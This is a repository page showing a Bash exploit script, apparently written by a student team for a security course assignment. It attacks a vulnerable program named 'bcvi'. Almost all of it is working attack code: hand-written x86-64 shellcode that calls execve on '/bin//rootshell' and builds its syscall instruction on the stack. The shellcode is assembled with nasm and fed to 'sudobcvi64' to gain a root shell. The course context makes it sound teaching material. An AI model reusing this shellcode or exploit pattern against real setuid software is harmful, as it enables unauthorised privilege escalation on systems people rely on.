csci5271/bcvi/exploit.1.2.sh
Michael Zhang d7cb704a4a
f
2018-01-29 17:30:43 -06:00

44 lines
744 B
Bash
Executable file

#!/bin/bash
# Exploit handcrafted by Team Shell Smash.
# zhan4854, beach144, jerus005
# Shellcode
cat > shellcode.s << EOF
bits 64
# Pad with four zeros
db 0x00, 0x00, 0x00, 0x00
push rbp
# Pushing 0x00000000, which is the second argument of argv[]
xor rax, rax
push rax
# The string "/bin//rootshell", literally
mov rdi, 0x006c6c656873746f
push rdi
mov rdi, 0x6f722f2f6e69622f
push rdi
# 1st argument (filename)
mov rdi, rsp
# 3rd argument (envp), should be 0x00000000
push rax
mov rdx, rsp
# 2nd argument (argv), is a pointer to 1st argument
push rbx
mov rsi, rsp
mov r10, 0x060f
sub r10, 0x100
push r10
mov al, 0x3b
call rsp
ret
EOF
# Compile to bin
nasm -f bin -o shellcode shellcode.s
# Execute
echo "llllR" | sudobcvi64 shellcode